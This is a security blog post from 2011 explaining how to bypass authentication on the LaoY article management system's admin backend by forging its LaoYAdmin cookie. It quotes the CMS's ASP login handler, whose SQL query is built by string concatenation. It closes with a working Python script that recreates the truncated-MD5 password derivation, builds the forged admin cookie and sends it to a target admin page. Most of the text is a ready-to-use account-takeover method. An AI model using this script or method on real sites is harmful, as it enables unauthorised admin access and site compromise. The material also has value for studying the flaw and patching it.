
LaoY Article Management System (老Y文章管理系统): Cookie Forgery

June 15, 2011 • Security

LaoY stores passwords as 19 characters cut out of the 32-character MD5 hex digest, so the stored value is useless against an ordinary MD5 lookup table (you never see the full digest). But LaoY authenticates the admin backend purely from a cookie, so there is no need to crack the MD5 at all: forge the cookie and walk straight into the backend.

The value of the LaoYAdmin cookie looks like this (four sub-keys, serialised the way classic ASP writes Response.Cookies("LaoYAdmin")(key)):

UserID=1&UserPass=f7820f85727a6a9cc23&UserName=admin&AdminRndPass=b76a6e1fb7b6e0aafb1bcea1c8608b59

That is the cookie. The catch is the fourth field, the random-pass value (AdminRndPass): without it you cannot get into the backend either, and it is not derived from the password. Here is the relevant part of the login handler:

Dim adminname, adminpwd, adminip

If Request("action") = "adminlogin" Then
    adminname = CheckStr(Trim(Request.Form("adminname")))
    adminpwd  = CheckStr(Trim(Request.Form("adminpwd")))
    ' Stored form of the password: 19 hex chars starting at position 11 of MD5("laoy" & password)
    adminpwd  = Mid(md5("laoy" & adminpwd, 32), 11, 19)
    ' Fresh random token for this login; written to both the cookie and the Admin table
    adminRndPassword = md5("l" & "a" & "o" & "yadmin" & RndNumber(1, 9999999999), 32)

    mycode = Trim(Request.Form("code"))
    If adminname = "" Or adminpwd = "" Then
        Call Alert("Please enter a username and password!", -1)
    End If
    If mycode <> Session("getcode") Then
        Call Alert("Please enter the correct verification code!", -1)
    End If

    Set rs = Server.CreateObject("ADODB.Recordset")
    sql = "select * from [" & tbname & "_Admin] where Admin_Name='" & adminname & "' and Admin_Pass='" & adminpwd & "'"
    rs.Open sql, conn, 1, 3
    If Not rs.EOF Then
        Session("YaoContent") = ""
        ' The cookie carries the stored hash and the random token verbatim
        Response.Cookies("LaoYAdmin").Path = SitePath
        Response.Cookies("LaoYAdmin")("UserID") = rs("ID")
        Response.Cookies("LaoYAdmin")("UserPass") = rs("Admin_Pass")
        Response.Cookies("LaoYAdmin")("UserName") = rs("Admin_Name")
        Response.Cookies("LaoYAdmin")("AdminRndPass") = adminRndPassword
        'Response.Cookies("LaoYAdmin").Expires = Date + 1
        rs("Admin_Time")   = Now
        rs("Admin_IP")     = GetIP
        ' The same token is persisted, overwriting whatever the previous login stored
        rs("AdminRndPass") = adminRndPassword
        rs.Update
        Response.Redirect "Index.asp"
    Else
        Call Alert("The username or password you entered is incorrect!", -1)
    End If
    rs.Close
    Set rs = Nothing

End If

The logic above: the administrator's username and password are submitted first; once they check out, a newly generated adminRndPassword (an MD5 value) is written into the database and copied into the cookie. So getting into the backend needs not only the admin's stored password hash (the 19-character Admin_Pass) but also the current AdminRndPass from the Admin table. Note that every successful login regenerates that token and overwrites the stored one, so a forged cookie only works until the next real admin login.

With those two values (plus the ID and username from the same table row) you can simply forge the LaoYAdmin cookie in Firebug, scoped to the site path, and you are in.
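Putting the two requirements together, as an added example that is not part of the original post or of the LaoY code: a Python script that reproduces the server's truncated-MD5 derivation, parses and rebuilds the LaoYAdmin cookie in the key=value&key=value form classic ASP uses for sub-keyed cookies, and sends it. The target URL and the admin index path are hypothetical; the hash helper assumes the CMS's md5() returns lowercase hex of the password bytes, as the sample values on the page suggest.

```python
import hashlib
from urllib.parse import parse_qsl, quote
from urllib.request import Request, urlopen

# Constructed sample: the LaoYAdmin cookie value quoted in the post.
SAMPLE_COOKIE = ("UserID=1&UserPass=f7820f85727a6a9cc23&UserName=admin"
                 "&AdminRndPass=b76a6e1fb7b6e0aafb1bcea1c8608b59")


def laoy_admin_pass(password: str) -> str:
    """Reproduce Mid(md5("laoy" & adminpwd, 32), 11, 19).

    VBScript Mid is 1-indexed, so characters 11..29 of the 32-char digest
    become the stored Admin_Pass. Assumption: the CMS's md5() helper yields
    lowercase hex over the password bytes (UTF-8 here).
    """
    full = hashlib.md5(("laoy" + password).encode("utf-8")).hexdigest()
    return full[10:29]


def check_admin_pass(stored_19: str, candidate: str) -> bool:
    """The comparison the login SQL performs: truncated hash of the
    candidate must equal Admin_Pass in the table."""
    return laoy_admin_pass(candidate) == stored_19


def parse_laoy_admin_cookie(value: str) -> dict:
    """Split the ASP dictionary cookie (key=value&key=value) into a dict."""
    return dict(parse_qsl(value, keep_blank_values=True))


def build_laoy_admin_cookie(user_id, user_pass, user_name, rnd_pass) -> str:
    """Serialise the four sub-keys as classic ASP does for
    Response.Cookies("LaoYAdmin")(key): LaoYAdmin=k1=v1&k2=v2 (URL-encoded)."""
    parts = [("UserID", str(user_id)), ("UserPass", user_pass),
             ("UserName", user_name), ("AdminRndPass", rnd_pass)]
    return "LaoYAdmin=" + "&".join(f"{k}={quote(v, safe='')}" for k, v in parts)


def fetch_with_cookie(admin_index_url: str, cookie_header: str) -> bytes:
    """Request the admin index with the forged cookie. admin_index_url is a
    hypothetical target; Index.asp is the redirect target in the login code."""
    req = Request(admin_index_url, headers={"Cookie": cookie_header})
    with urlopen(req, timeout=10) as resp:
        return resp.read()


if __name__ == "__main__":
    # Values an attacker would have read from the <tbname>_Admin table:
    # ID, Admin_Name, Admin_Pass (19 chars) and AdminRndPass (32 chars).
    fields = parse_laoy_admin_cookie(SAMPLE_COOKIE)
    cookie = build_laoy_admin_cookie(fields["UserID"], fields["UserPass"],
                                     fields["UserName"], fields["AdminRndPass"])
    print(cookie)
    # Hypothetical target; uncomment to send the forged cookie:
    # print(fetch_with_cookie("http://target.example/admin/Index.asp", cookie))
```

The values come straight from the Admin table row; nothing is inverted. If the stored AdminRndPass changes (any real admin login regenerates it), rebuild the cookie from the new value.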
